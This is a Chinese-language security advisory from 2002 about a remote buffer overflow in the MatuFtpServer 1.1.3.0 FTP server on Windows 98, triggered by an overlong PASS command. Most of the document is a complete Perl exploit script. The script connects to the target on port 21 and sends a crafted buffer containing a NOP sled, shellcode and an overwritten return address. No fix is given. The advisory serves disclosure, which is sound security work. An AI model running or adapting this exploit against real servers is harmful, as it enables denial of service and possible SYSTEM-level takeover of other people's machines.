MatuFtpServer存在缓冲溢出漏洞发布时间:2002-05-24 更新时间:2002-05-24 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 MatuFtpServer 1.1.3.0(1.13)详细描述 MatuFtpServer ( http://www.matusoft.com/matuftpserver/ )是日文的FTP服务器,运行在WINDOWS9X上。 其中提交带超长参数的PASS命令给服务器,可导致出现缓冲溢出,存在以SYSTEM权限执行任意代码的可能。 测试代码 #!/usr/local/bin/perl #----------------------------------------------- # MatuFtpServer 1.1.3.0 exploit ( for Windows98 ) # written by Kanatoko <anvil@jumperz.net> # http://www.jumperz.net/ #----------------------------------------------- use Socket; $connect_host = "target.example.com"; $port = 21; $iaddr = inet_aton( $connect_host ) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in( $port, $iaddr ); socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die "Socket Error.\n"; connect( SOCKET, $sock_addr ) || die "Connect Error\n"; select( SOCKET ); $|=1; select( STDOUT ); #egg written by UNYUN (http://www.shadowpenguin.org/) #16bytes $egg = "\x43\x43\x43\x43\x43\x53\x53\x53"; $egg .= "\xB8\x2D\x23\xF5\xBF\x48\x50\xC3"; #0x0177F984 $buf = "\x90" x 1032; $buf .= $egg; $buf .= "\x8C\xF9\x77\x01"; $buf .= "A" x 696; print SOCKET "PASS $buf\r\n"; $hoge = <SOCKET>; print $hoge; 解决方案 尚无 相关信息 Kanatoko (anvil@jumperz.net) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-05/0194.html 相关主页:http://www.matusoft.com/matuftpserver/ |
